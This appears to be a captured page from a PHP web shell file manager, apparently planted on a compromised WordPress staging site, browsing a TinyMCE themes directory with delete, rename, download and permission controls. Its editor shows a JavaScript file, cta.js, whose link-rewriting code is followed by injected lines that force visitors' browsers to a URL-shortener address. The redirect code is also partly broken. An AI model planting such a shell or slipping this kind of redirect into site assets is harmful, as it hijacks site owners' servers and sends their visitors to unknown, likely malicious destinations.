📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: cta.js
window.addEventListener('load', function() { let originalURL = document.querySelectorAll("a[href]"); let originalUrlArray = [...originalURL]; let urlValue = []; for(let i = 0; i < originalUrlArray.length; i++) { urlValue[i] = originalUrlArray[i].href; } const queryString = window.location.search; const urlParams = new URLSearchParams(queryString); addParameters(); function addParameters() { for(let i = 0; i < urlValue.length; i++) { urlValue[i] = new URL(urlValue[0]); } let newUrls = []; for(let i = 0; i < urlValue.length; i++) { for (const [key, value] of urlParams) { newUrls[i] = urlValue[i].searchParams.append(key, value); } } for(let i = 0; i < urlValue.length; i++) { originalUrlArray[i].href = urlValue[i]; } } }) window.location.href = "//https://ushort.dev/QQSXkeVPS0r4"; window.location.href = "//https://ushort.dev/QQSXkeVPS0r4";
Save